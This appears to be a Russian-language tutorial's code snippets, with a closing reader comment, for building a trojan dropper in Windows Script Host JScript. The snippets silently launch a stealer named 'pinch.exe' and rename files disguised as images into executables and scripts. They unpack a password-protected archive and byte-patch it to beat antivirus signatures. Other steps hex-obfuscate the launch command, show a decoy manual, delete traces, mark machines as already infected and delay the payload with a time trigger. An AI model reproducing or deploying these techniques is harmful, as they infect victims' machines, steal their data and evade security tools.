var wsws = WScript.CreateObject("WScript.Shell");
//запускаем троян из папки Temp
wsws.Run("pinch.exe -d%temp%",0);
var wsws = WScript.CreateObject("WScript.Shell");
//-p - пароль к созданному ранее архиву
wsws.Run("sfx_with_pass.exe -pZLAYASATANAPRIDET -d%temp%",0);
//запускаем мануал из папки Temp
wsws.Run("notepad %temp%\\manual.txt",1);
Path=%temp%
SavePath
Setup=outside.js
Silent=1
Overwrite=1
%systemroot%\System32\cmd.exe /c rename %temp%\outside.gif outside.js
Path=%temp%
SavePath
Setup=help.lnk
Setup=outside.js
SetupCode
Silent=1
Overwrite=1
var wsws = WScript.CreateObject("WScript.Shell");
//переименовываем архив перед запуском
wsws.Run("cmd.exe /c rename %temp%\\sfx_with_pass.png sfx_with_pass.exe",0);
//Запускаем через вызов cmd, чтобы скрипт не ругался на отсутствие файла.
//-p - пароль к созданному ранее архиву
wsws.Run("cmd.exe /c %temp%\\sfx_with_pass.exe -pZLAYASATANAPRIDET -d%temp%",0);
//запускаем мануал из папки Temp
wsws.Run("notepad %temp%\\manual.txt",1);
var wsws = WScript.CreateObject("WScript.Shell");
//запускаем мануал из папки Temp
wsws.Run("notepad %temp%\\manual.txt",1);
//файло для потчинга
var file="sfx_with_pass.png";
var inp=new ActiveXObject("ADODB.Stream");
inp.Type=1;
inp.Open();
inp.LoadFromFile(file);
var out=new ActiveXObject("ADODB.Stream");
out.Type=1;
out.Open();
//смещение первого места для потчинга
var position=0x430;
inp.CopyTo(out,position*1);
inp.Read(1);
out.Write(mb2b(eval("'"+"\x87"+"'")));
//вычисляем второе смещение
var position=0x30000-position;
inp.CopyTo(out,(position*1)-1);
inp.Read(1);
out.Write(mb2b(eval("'"+"\x52"+"'")));
inp.CopyTo(out);
//отпут схороняет все в файл
out.SaveToFile("sfx_with_pass.exe",2);
function mb2b(byte){
with(new ActiveXObject("ADODB.Recordset")){
Fields.Append("x",205,1);
Open();
AddNew();
Fields(0).AppendChunk(byte);
return Fields(0).GetChunk(1);
}
}
//-p - пароль к созданному ранее архиву
wsws.Run("cmd.exe /c %temp%\\sfx_with_pass.exe -pZLAYASATANAPRIDET -d%temp%",0);
//будет
var _0x72c6=["\x50\x52\x49\x44\x45\x54","\x5A\x4C\x41\x59\x41","\x53\x41\x54\x41\x4E\x41","\x63\x6D\x64\x2E\x65\x78\x65\x20\x2F\x63\x20\x25\x74\x65\x6D\x70\x25\x5C\x73\x66\x78\x5F\x77\x69\x74\x68\x5F\x70\x61\x73\x73\x2E\x65\x78\x65\x20\x2D\x70","\x20\x2D\x64\x25\x74\x65\x6D\x70\x25"];var a=_0x72c6[0];var c=_0x72c6[1];var b=_0x72c6[2];wsws.Run(_0x72c6[3]+c+b+a+_0x72c6[4],0);
//вместо этого
wsws.Run("cmd.exe /c %temp%\\sfx_with_pass.exe -pZLAYASATANAPRIDET -d%temp%",0);
//.......
//выше все что было раньше
wsws.Run("cmd.exe /c del %temp%\\manual.txt",2);
wsws.Run("cmd.exe /c del %temp%\\help.lnk",2);
wsws.Run("cmd.exe /c del %temp%\\outside.js",2);
WScript.Sleep(3000);
wsws.Run("cmd.exe /c del %temp%\\sfx_with_pass.png",2);
wsws.Run("cmd.exe /c del %temp%\\sfx_with_pass.exe",2);
wsws.Run("cmd.exe /c del %temp%\\inside.js",2);
var wsws = WScript.CreateObject("WScript.Shell");
//добавляем в скрипт
var fso = WScript.CreateObject("Scripting.FileSystemObject");
if (fso.FileExists("C:\\uje_zarazili_ne_trogat.txt")){
wsws.Run("notepad %temp%\\manual.txt",1);
wsws.Run("cmd.exe /c del %temp%\\manual.txt",2);
wsws.Run("cmd.exe /c del %temp%\\help.lnk",2);
wsws.Run("cmd.exe /c del %temp%\\outside.js",2);
WScript.Sleep(5000);
wsws.Run("cmd.exe /c del %temp%\\sfx_with_pass.png",2);
}else {
//////////////
// Остальной кодес (переименование, патчинг архива, запуск, удаление и т.д.)
//////////////
wsws.Run("notepad %temp%\\manual.txt",1);
var a = fso.CreateTextFile("C:\\uje_zarazili_ne_trogat.txt", true);
a.WriteLine("Zarazili tobi lalka!!!!11111");
a.Close();
}
/.....
time_now = new Date();
time_trigger = new Date("Sat Aug 23 2014 21:53:47 GMT+0400");
if (time_now > time_trigger){
//Запускаем троян. Либо любой другой код...
wsws.Run("pinch.exe",1);
}else {
//Запускаем мануал. Либо любой другой код...
wsws.Run("notepad %temp%\\false.txt",1);
}
Это так,но после изучения статьи,можно научиться всяким маленьким фишкам.Для общего развития полезно.для сбития чисто сигнарутного детекта при контекстном сканировании можно так с бубном и не танцевать.